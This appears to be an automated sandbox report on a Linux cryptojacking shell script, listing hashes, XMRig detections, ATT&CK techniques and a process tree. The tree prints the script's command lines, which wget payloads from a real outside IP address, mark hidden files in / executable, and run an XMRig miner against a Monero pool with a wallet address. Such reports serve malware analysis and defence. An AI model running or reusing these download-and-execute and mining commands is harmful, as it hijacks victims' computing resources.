Analysis
- max time kernel: 149s
- max time network: 151s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/10/2024, 01:53
Static task: static1
Behavioral tasks (sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh in each):
- behavioral1: resource ubuntu1804-amd64-20240729-en
- behavioral2: resource debian9-armhf-20240611-en
- behavioral3: resource debian9-mipsbe-20240729-en
- behavioral4: resource debian9-mipsel-20240418-en
General
- Target: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
- Size: 700B
- MD5: c4d089011765cf8fa828d28b6eeeac3e
- SHA1: 43d933e706b0eefd0db2b5acba19205ebc1af2bd
- SHA256: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
- SHA512: 3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config
Signatures
- XMRig Miner payload (2 IoCs): behavioral2/files/fstream-1.dat matched YARA rules family_xmrig and xmrig.
- File and Directory Permissions Modification (1 TTP, 26 IoCs): adversaries may modify file or directory permissions to evade defenses. Triggered by the 26 chmod processes listed in the process tree below.
- Executes dropped EXE (16 IoCs): the downloaded files /.__min__c and /.__min__ were executed (16 processes, listed in the process tree below).
- YARA match upx: behavioral2/files/fstream-2.dat matched YARA rule upx.
- Checks CPU configuration (1 TTP, 1 IoC): reads CPU information that indicates whether the system is a virtual machine. File opened for reading: /proc/cpuinfo (process: curl).
- Enumerates kernel/hardware configuration (1 TTP, 1 IoC): reads the /sys virtual filesystem to enumerate system information. File opened for reading: /sys/devices/system/cpu (process: nproc).
- Reads runtime system information: files opened for reading: /proc/sys/crypto/fips_enabled and /proc/self/auxv (process: curl).
Processes
Format: PID, image, command line, triggered signatures in brackets. Every process below is a direct child of the sample script (depth 1); all children run at depth 2.

PID 656  /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh   /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
  PID 657  /usr/bin/wget   wget 205.185.117.101/log2 -O /dev/null
  PID 677  /usr/bin/curl   curl -L 205.185.117.101/log2 -o /dev/null   [Checks CPU configuration; Reads runtime system information]
  PID 684  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 763  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 764  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 765  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 766  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 767  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 768  /usr/bin/nproc  nproc --all   [Enumerates kernel/hardware configuration]
  PID 770  /bin/hostname   hostname
  PID 771  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 773  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 776  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 777  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 780  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 784  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 785  /bin/hostname   hostname
  PID 786  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 788  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 791  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 792  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 793  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 795  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 796  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 799  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 800  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 801  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 803  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 804  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 805  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 806  /bin/hostname   hostname
  PID 807  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 809  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 812  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 813  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 814  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 816  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 817  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 820  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 821  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 822  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 824  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 825  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 826  /bin/hostname   hostname
  PID 827  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 829  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 831  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 833  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 834  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 835  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 837  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 838  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 841  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 842  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 843  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 845  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 846  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 849  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 850  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 851  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 853  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 854  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 859  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 860  /bin/hostname   hostname
  PID 861  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 863  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 864  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 865  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 866  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 868  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 869  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
  PID 874  /bin/chmod      chmod +x /.__min__c   [File and Directory Permissions Modification]
  PID 875  /bin/chmod      chmod +x /.__min__m   [File and Directory Permissions Modification]
  PID 876  /.__min__c      /.__min__c   [Executes dropped EXE]
  PID 878  /usr/bin/wget   wget 205.185.117.101/__min__c -O /.__min__c
  PID 879  /bin/chmod      chmod +x /.__min__    [File and Directory Permissions Modification]
  PID 880  /bin/hostname   hostname
  PID 881  /.__min__       /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k   [Executes dropped EXE]
  PID 883  /usr/bin/wget   wget 205.185.117.101/__min__ -O /.__min__
  PID 884  /usr/bin/wget   wget 205.185.117.101/__min__m -O /.__min__m
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1): Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1): System Checks (1)
Downloads